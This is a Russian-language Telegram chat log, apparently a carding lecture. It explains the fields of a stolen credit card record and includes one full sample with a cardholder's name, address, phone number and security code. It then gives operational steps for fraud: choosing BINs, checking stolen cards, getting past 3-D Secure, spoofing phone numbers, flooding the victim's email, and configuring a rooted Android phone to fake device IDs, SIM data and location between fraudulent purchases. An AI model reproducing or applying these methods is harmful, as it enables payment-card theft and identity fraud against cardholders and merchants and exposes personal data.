Володя Путен, [09.09.19 13:58]
На карте отбиты следующие данные: номер карты, имя фамилия владельца, дата истечения срока службы карты, с обратной стороны, там где должна быть подпись владельца, напечатан код безопасности из трех или пяти цифер, в зависимости от типа карты. О типах мы поговорим позже.
Володя Путен, [09.09.19 13:58]
Итак, как же выглядит сс? А выглядит оно вот так:
Володя Путен, [09.09.19 13:59]
4270 8150 0144 9160 | 01 | 19 | 506 | 10128 | US | NY | New York | 1199 Park Avenue, Apt. 7F | Robert J Von Phul | 6465300364 | classic | credit | usaa savings bank | male | [email protected] DBdec/2016 | Approve |
Володя Путен, [09.09.19 13:59]
первые 16 цифр, разделенные по 4 (в разных шопах по разному, есть разделенные и неразделенные, но везде 16 цифр) - это номер карты
Володя Путен, [09.09.19 13:59]
У карт есть брэнды. В США их 4 основных: VISA, MasterCard. American Express и Discovery
Володя Путен, [09.09.19 13:59]
Начимся их отличать. Visa ВСЕГДА начинается с цифры 4, Mastercard начинается с цифры 5, Discovery с цифры 6 и Amex с цифры 3
Володя Путен, [09.09.19 13:59]
Номер карты генерируется по специальному алгоритму. Причем первые 6 цифр для конкретного взятого банка являются константой. Они называются Bin - bank identification number.
Володя Путен, [09.09.19 13:59]
То, что эти 6 цифр постоянны, очень полезно для нас, кардеров, поскольку с помощью них мы можем осуществить поиск и покупать аналогичные карты того же банка
Володя Путен, [09.09.19 13:59]
Далее, 01 19 - это месяц и год истечения карты. В шопах частенько вместо 01 могут писать January, 02 - February и тд. По этому учим названия месяцев по английски
Володя Путен, [09.09.19 13:59]
19 - это, понятно, год. В некоторых шопах используется четырехзначное значение - 2019
Володя Путен, [09.09.19 13:59]
606 - это защитный код карты. Он называется по разному: Card Verification Number (CVN), CVV, CVV2, CSC (Card Security Code)
Володя Путен, [09.09.19 13:59]
10128 - это ZIP, postal code. Почтовый индекс адреса владельца карты.
Это очень важная вещь для карты, потому что многие мерчи сверяют именно зип карты
Володя Путен, [09.09.19 13:59]
US - это код страны
Володя Путен, [09.09.19 14:00]
Причем надо отметить, что иногда бывает так, что карта выпущена банком, не являющимся частью американской банковской системы, но имеет американский биллинг адрес. Таких карт много из канады, допустим. Тут надо смотреть по обстоятельствам.
Володя Путен, [09.09.19 14:00]
NY - это код штата Штатов в америке 50. Причем в некоторых шопах пишут полное название штата при выборе на чекауте
Володя Путен, [09.09.19 14:00]
New York - город. Город может записываться по разному, если он имеет сложное название, скажем, Fort Lauderdale пишут и Ft. Lauderdale. Советую писать информацию полностью согласно тому. как пишет ее владелец карты.
Володя Путен, [09.09.19 14:00]
1199 Park Avenue, Apt. 7F - это адрес, и он может записываться тоже по разному, для адреса на чекауте предоставляется 2 строки, на первой пишется номер улицы, на второй пишется номер квартиры, если дом многоэтажный. Можно эту информацию по разному записывать, можно записать все на одной строке. После Avenue пробел и сразу Apt. Можно на второй перенести, тут как кому больше нравится
Володя Путен, [09.09.19 14:00]
Robert J Von Phul - это имя кх (кх = Card Holder, то есть владелец карты) на карте. если нужно написать first и last name, то выбрасывается инициал middle name/ Если нужно записать как написано на карте, то пишите полностью. Потому что инициалы действительно отпечатывают на картах в качестве части имени. Далеко не все мерчи могут проверять имя, например, пейпал (PayPal)
Володя Путен, [09.09.19 14:00]
По этому, если вам попалась организация, не паникуйте. На карте действительно вместо людских имен бывают имена организаций. В некоторых случаях я допускал писать имя организации в точности, как написано на карте, в некоторых я просто менял это имя на человеческое.
Володя Путен, [09.09.19 14:00]
6465300364 - десятизначный номер телефона кх. Вот тут внимание, тут тоже много вариантов. Если у шопа есть доступ в БГ или он прозванивает банк, не советую менять номер. Если шоп небольшой и прозванивает только что бы подтвердить то, что вы указали в ордере, тогда можно менять на единичку в конце и прозванивать с подменой номера. Обычно этим занимаются стафферы (те кто вбивает товар)
Володя Путен, [09.09.19 14:00]
Иногда случаются ситуации, когда вы купили сс, а у нее нет данных по номеру. Такое действительно случается и тут я рекомендую либо воспользоваться поиском по личностям intelius.com. Осуществляет поиск по public records - публичным данным, и порой неплохую выдает поднаготную на товарищей с редкими именами
Володя Путен, [09.09.19 14:00]
classic - это уровень карт, от уровня карт зависят различные параметры вроде кредитного лимита и тд. К сожалению, не всегда уровень карты свидетельствует о том, что на ней будет куча бабла. Тут надо опять же заниматься статистической выборкой и формировать свой список бинов. Допустим, когда я вскрыл баг в одном шопе, мне нужен был бин, авторизующий 10к баксов, такой ордер, естественно, будет отменен, но мне нлавное, что бы прошла авторизация.
Володя Путен, [09.09.19 14:01]
Я нашел несколько бинов уровня business. Вот на business картах с большой долей вероятности будет большая сумма денег, хотя встречаются и нищеброды-американцы, к сожалению, даже на business имеющие не более 300 баксов. Есть еще такой уровень карт - prepaid. Очень не рекомендую его покупать в связи с тем, что это карты немногократного использования, часто используются в качестве гифтов. Такие карты как правило не пополняются, сколько есть на них денег - столько и тратится и они лежат с нулевым балансом
Володя Путен, [09.09.19 14:01]
usaa savings bank - это банк. Не слишком буду углубляться в банковскую систему США, отмечу только что у них есть как правило банки, кредитные организации и карты корпораций. Банков великое множество, есть популярные, есть не очень. У всех разные капиталы и число держателей счетов и карт. Самые популярные банки в США - Bank of America, Chase, Capital One.
Володя Путен, [09.09.19 14:01]
Соответственно их карты в шопах с большой долей вероятности вбиваются другими кардерами. Есть много хороших и не сильно задроченных банков - pnc bank, huntington national bank, compass bank, world foremost bank.
Володя Путен, [09.09.19 14:01]
Кредитные организации (credit union) - это еще один тип кредитных учреждений в США, которые занимаются ссудами, ипотеками и еще много чем. У них тоже есть популярные и малоизвестные кредитные организации локальных масштабов. Одним из самых популярных кредит юнионов является navy fcu.
Володя Путен, [09.09.19 14:01]
так же есть организации, занимающиеся процессингом платежей по картам, и корпорации, выпускающие кредитные карты, допустим, pulse network llc, star processing, computers networks. На их картах можно с различной вероятностью найти деньги для снятия. Вот например, pulse network я снимал по 700 баксов с саморега PayPal. Star Processing послабее, где-то 150.
Володя Путен, [09.09.19 14:01]
male - этот параметр предоставляется не во всех шопах. Пробив человека по базе имен и соотнесение имени с полом. Иногда имена имеют неясное отношение к конкретному полу, по этому пишут unisex. Данная информация полезна для изменения голоса на противоположный пол. male - мужчина, female - соответственно женщина.
Володя Путен, [09.09.19 14:01]
[email protected] - это имейл кардхолдера. как правило, не относится к биллинг данным, вместо него мы всегда указываем свой, но туда частенько приходят отчеты от банка по просмотру стейтмента и трат, по этому при желании можно использовать софт или сервис и заспамить эту почту.
Володя Путен, [09.09.19 14:02]
Approve - это статус карты. перед покупкой можно чекнуть карту на валид и в случаи невалида деньги всегда вернутся вам на счет, в шопах у которых допустим есть чек на валид. Тут можно целую дискуссию проводить, стоит или не стоит чекать карты свежих баз на валид перед покупкой. бытует мнение, что чекеры портят карты.
Володя Путен, [09.09.19 14:02]
В принципе, от части это убеждение не лишено оснований. Потому что чекеры имеют одинаковые мерчи для процессинга карт и это может портить карты, особенно одних и тех же банков. Я бы рекомендовал проверять карты на валид перед покупкой с помощью бесчарджевого чекера simple. Нам очень важно, что бы адрес и сама карта были валидными.
Володя Путен, [09.09.19 14:02]
Теперь поговорим об ответах чекера карт. Может сложится ситуация, когда мы купили лишнюю карту или же она не вошла в палку и мы отложили ее до лучших времен, и вот эти времена настали. Хотелось бы чекнуть эту карту еще раз перед вбивом в шоп.
Володя Путен, [09.09.19 14:02]
Тут я рекомендую сервис .
Володя Путен, [09.09.19 14:02]
Выбираем чекер и карта проверяется. В зависимости от валидности, нам могут показывать следующие коды:
Володя Путен, [09.09.19 14:02]
00, 85 - это значит платёж успешно проведён, всё хорошо
05 - Do not honour - банк отклонил транзакцию без объяснения причин. значит деклайн. самая частая причина
43 - Pickup card, fraud account - карта возвращается в банк на перевыпуск из-за мошенничества, похожий код есть в случае простой потери карты
14 код - invalid card number - тоже означает, что карта перевыпущена и удалена из БД банка
AVS not match - значит не совпадает адрес. Кх переехал и изменил биллинг данные
Володя Путен, [09.09.19 14:03]
Еще мне бы хотелось отдельно поговорить вот о какой вещи, о том, как осуществляется процессинг карты. Он может осуществляться как с помощью карт Verified by Visa (для Visa) и 3DSecure (для MasterCard), так и без них. Первый случай не очень часто распространенный, но в большинстве платежных систем он есть.
Володя Путен, [09.09.19 14:03]
Карты могут быть vbv и novbv - тоесть к ним могут быть подключены системы верификации платежа платежным паролем или не подключены. Надо отметить, что без vbv трудно проводить платежи. Часто платеж деклайнится. Как быть с vbv? Тут есть 3 варианта развития событий
Володя Путен, [09.09.19 14:03]
Карты могут быть "преэнроллены" для создания вбв-пароля, и что бы создать этот пароль, для каждого бина - бина, отмечу, даже не банк - есть свои правила. Практически всегда указываются данные с карты: имя, зип, свв2, дата истечения срока. Но вот только есть бины, в которых достаточно информации про зип, что бы создать платежный пароль. Есть бины, в которых нужно указать ссн и доб (SSN - идентификационный номер кх, DOB - дата рождения кх).
Володя Путен, [09.09.19 14:03]
А есть бины, где сложная система, вроде usaa saving bank, там надо еще какуюто информацию о кх указать, то есть без БГ не обойтись.
Володя Путен, [09.09.19 14:03]
3S Secure - это примерно то же, что и vbv, но уже касательно MasterCard кард. Для Discover, Amex не предусмотрнены такие защитные механизмы. Для вбивов советую использовать Visa, MC, реже - Discover.
Володя Путен, [09.09.19 14:03]
На этом мини лекцию по сс мы и закончим.
Володя Путен, [09.09.19 14:03]
теперь разберем вбив с телефона. Я его гдето вычитал, потестил, достаточно удачно, даже очень удачно. Вбив с телефона на ведре (android)
Володя Путен, [09.09.19 14:03]
Настроить под вбив андроид может любой человек при наличии прямых рук и головы. Есть два типа вбива с телефона, собственно как и два типа людей: 1) те, кто не особо хочет копаться, это вбив с браузера телефона; 2) это вбив с приложения. Вариант гораздо сложнее, но в целом может каждому пригодится.
Володя Путен, [09.09.19 14:04]
Первое что необходимо сделать - это получить root права на телефоне. Я использую Kingo root, скачиваю apk файл и устанавливаю, самый простой и эффективный метод получения root прав.
Володя Путен, [09.09.19 14:04]
Весь список софта для андроида:
1. Kingo root
2. xposed installer (framework)
3. device id changer Pro
4. Proxy Droid
5. DNS Forwarder
6. xprivacy
7. ccleaner
8. root cloak
9. Location cheater
Володя Путен, [09.09.19 14:04]
Для вбива с приложения вам просто необходим xposed framework, без него у вас вряд ли что получится или если вы меняете телефоны после каждого вбива - тогда да, можно обойтись и без этого софта. Но думаю это экономически не выгодно по этому юзаем именно этот софт. Это системная программа для изменения настроек прошивок (версий OS)
Володя Путен, [09.09.19 14:04]
device id changer Pro - программа меняет идентификационные данные о железе вашего телефона (imei например) и другие параметры, это модуль xposed frameworka
Володя Путен, [09.09.19 14:04]
Proxy droid - через него ставим соксы, но если вы будете подключаться к Raspberry на который вы будете надевать сокс, то в принципе вам эта программа нафиг не нужна.
Володя Путен, [09.09.19 14:04]
DNS Forwarder - иногда, так случается, при подключенном носке отображается неверный DNS, в таком случаи юзаем этот софт и меняем DNS на тот, который нам необходим. Список DNS я скидывал ранее когда объяснял о настройку Raspberry и смены DNS на нем.
Володя Путен, [09.09.19 14:04]
ccleaner - полагаю все знают что это такое, но для тех кто не знает: после каждого вбива этим софтом мы будем чистить телефон
Володя Путен, [09.09.19 14:04]
Location cheater - служит для подмены данных местоположения
Володя Путен, [09.09.19 14:04]
root cloak (модуль framework) - служит для того, что бы скрывать от других приложений. что телефон имеет root права
Володя Путен, [09.09.19 14:05]
xprivacy - это софт, который подменяет симкарту и не только: он либо разрешает, либо запрещает видеть определенные сведения всем приложениям. В дополнение к ней я бы советовал приложение sim card, на нем можно отточить то что запрещать, а что разрешать приложениям видеть, что бы в них отображалась корректная информация об устройствах.
Володя Путен, [09.09.19 14:05]
Все приложения (кроме ccleaner) не работают без root прав.
Володя Путен, [09.09.19 14:05]
Сначала ставим xposed installer, после того как получили root права, через него устанавливаем framework. Скажу сразу, здесь мы столкнемся с трудностями поставить фреймворк, нам нужен андроид версии 4.4.4 (на него проще всего поставить эту прогу), на версиях выше сделать это крайне проблематично, но если вы умеете ставить кастомный рекавери и прошивать архивы то можете попробовать. В остальом советую у кого прошивка выше, откатить самим на ведро 4.4.4 или отнести в серсивный центр и вам там прошьют, стоит это не дорого. Плюс на 4.4.4 гораздо удобнее работать, чем на версиях выше.
Володя Путен, [09.09.19 14:05]
Вот ссылка на 4pda, там найдете инсталлер на 4.4.4.(и версии выше)
Володя Путен, [09.09.19 14:05]
После того ткак поставили xposed framework ставим следуюющие программы:
Володя Путен, [09.09.19 14:05]
device id changer Pro. Прошу обратить внимание, именно Pro версию!!! Дальше Proxy Droid (в случаи необходимости), DNS Forwarder, ccleaner, Location cheater, xprivacy, и root cloak. xprivacy и root cloak ставится внутри xposed installer,заходим в раздел Загрузка и там в поиске их изем и устанавливаем.
Володя Путен, [09.09.19 14:05]
Ну и важное примечание: apkpure.com сразу сайт добавьте в закладки, и скачать приложения sim card (зеленая симка на ярлыке)
Володя Путен, [09.09.19 14:05]
Когда вы поставили все выше перечисленные программы, нужно зайти в xposed installer, раздел Модули, и поставить галочки на всех модулях (device id ch/root cloak/xprivacy)
Володя Путен, [09.09.19 14:06]
Потом зайти в раздел фремворка и прожать быстрая перезагрузка, что бы модули установились, если этого не сделать модули не будут корректно работать.
Володя Путен, [09.09.19 14:06]
Собственно по установке на андроид - все. теперь поговорим об xprivacy, очень полезная штука когда работаешь с серьезными шопами, банками и тд, лично я его юзаю для подмены сим карты, по факту возможностей на много больше.
Володя Путен, [09.09.19 14:06]
Заходим в него и переходиим в раздел параметры, трогаем только те значения что связаны с симкой:
Володя Путен, [09.09.19 14:07]
А это:
номер телефона
MCC
MNC
код страны
оператор
ICC ID
ID подписки
Володя Путен, [09.09.19 14:07]
Возьмем за основу номер 4356681778, если ктото подстраивается под холдера и ему нужно пробить оператора, идем сюда
Володя Путен, [09.09.19 14:07]
Что такое МСС - с этим можете ознакомиться здесь:
, из этой же страницы можете взять значение для нашего параметра в проге
Володя Путен, [09.09.19 14:07]
MNC это код оператора, посмотреть код нужного оператора (нажной страны) вы можете так же здесь:
.
Володя Путен, [09.09.19 14:07]
теперь что такое icc id и id подписки, и как его прописать
Володя Путен, [09.09.19 14:07]
icc id это серийный номер симки, который состоит из 19 цифрю
Володя Путен, [09.09.19 14:07]
Володя Путен, [09.09.19 14:07]
Первые 2 цифры 89 всегда ставятся по дефолту, это относится к отрасли, ее идентификатор. дальше то что выделено, это идет код страны, длиной от 1 до 3 цифр.
Володя Путен, [09.09.19 14:08]
Володя Путен, [09.09.19 14:08]
По юсе это 01, по другим странам значения отличаются
Володя Путен, [09.09.19 14:08]
Так поскльку мы подстраиваемся под юсу, в значении ICC ID первые 4 цифры будут всегда 8901, а остальные 15 цифр можно писать рандомно.
Володя Путен, [09.09.19 14:08]
ID подписки (в xprivacy). А вообще это называется sim imsi. Как его прописать? Смотрим картинку.
Володя Путен, [09.09.19 14:08]
Володя Путен, [09.09.19 14:08]
Он всегда состоит из 15 цифр. Прописываем сначала значение MMC, затем MNC, затем остальные цифры пишем рандомно, что бы в итоге было 15 сиволов в этом поле
Володя Путен, [09.09.19 14:08]
Как сделать что бы данные подменялись, когда устанавливаете новое приложение: xprivacy кидает уведомление, и те данные что нужно подменить, нажимаете на кнопку запретить (deny)
Володя Путен, [09.09.19 14:08]
и вот тут пригодится приложение Sim card, которое поможет набить руку какие начения подменять
Володя Путен, [09.09.19 14:08]
Теперь опишу как происходит вбив
Володя Путен, [09.09.19 14:08]
Если вы уже подключили носок (сокс, туннель, не важно) в Raspberry, подключились к нему по WIFI сети с мобильного, то идем на whoer.net, смотрим какой часовой пояс, идем в настройки, ставим часовой пояс и язык под холдера
Володя Путен, [09.09.19 14:08]
Потом в location cheater задаем координаты, я обычно ставлю в пару метров от нужного адреса (под айпи или шип)
Володя Путен, [09.09.19 14:09]
идем опять на whoer.net, и смотрим все ли нормально поставилось.
Володя Путен, [09.09.19 14:09]
Что бы проверить работает ли location cheater или нет, скачиваем гугл карты, и там смотрим (нажать на кнопку мое местоположение)
Володя Путен, [09.09.19 14:09]
Если все работает то скачиваем нужное приложение. Потом открывает root cloack, заходим в первый раздел (добавить\удалить приложение) и надимаем на плюсик, и ищем наше приложение, после этого что бы сохранить настройки заходим xposed installer, раздел фреймворк, и нажимаем быстрая перезагрузка. После этого даже если вы удалите приложение, его запомнит root cloak и делать этого каждый раз не нужно
Володя Путен, [09.09.19 14:09]
После вбива, что бы начать следующий, нужно зайти в device id changer, в первом разделе device id нажать random all и apply, затем зайти в xposed installer раздел фрейворк , и нажать быстрая перезагрузка, тобы железо поменялось.
Володя Путен, [09.09.19 14:09]
И так собственно мы научились подменять данные, железо, местоположение и так далее. Теперь заново ставим приложение и вбиваем, не забываем менять данные в xprivacy. Если надо условно бить палку перебором и что бы каждый раз не качать приложение, не регать гугл акк что очень напрягает, юзаем сайт apkpure.com, там можно скачать приложение и добавить его на телефон
Володя Путен, [09.09.19 14:09]
То есть как отработали акк, удалили, поменяли данные, перезагрузили устройство, просто устанавливаете приложение заново
Володя Путен, [09.09.19 14:09]
Теперт перейдем к вбиву с браузера
Володя Путен, [09.09.19 14:09]
Здесь все намного проще, в целом любая версия андроида подходит для работы
Володя Путен, [09.09.19 14:10]
Для вбива нам необходимо:
1) Сам браузер ( chrome, firefox, родной браузер телефона и тд)
2) ссleaner (или менеджер приложений есть априори на каждом андроиде)
3) proxy droid (в случаи необходимости, если вы не используете Raspberry).
4) DNS Forwarder
5) Location cheater (браузеры в целом запрашивают gps данные, имеет смысл координаты подменить под ip)
Володя Путен, [09.09.19 14:10]
В случаи работы с браузером, железо менять не обязательно, но переустанавливать браузер желательно, и чистить его. Вбив почти такой же как и с приложения, просто пропускаем пункты с device id changer/root cloak/xprivacy.
Володя Путен, [09.09.19 14:10]
В основном бьют с моззилы (так ак там webrtc отключается так же как и на компе), либо с родного браузера (на новых версиях андроида - редкость)
Володя Путен, [09.09.19 14:10]
Чистим кэш (и историю) через ccleaner или менеджер приложений после каждого вбива обязательно
Володя Путен, [09.09.19 14:10]
В целом на сегдня все. Надеюсь лекция была полезна для каждого из вас, и все вы пришли сюда не просто почитать информацию. но и планируете работать.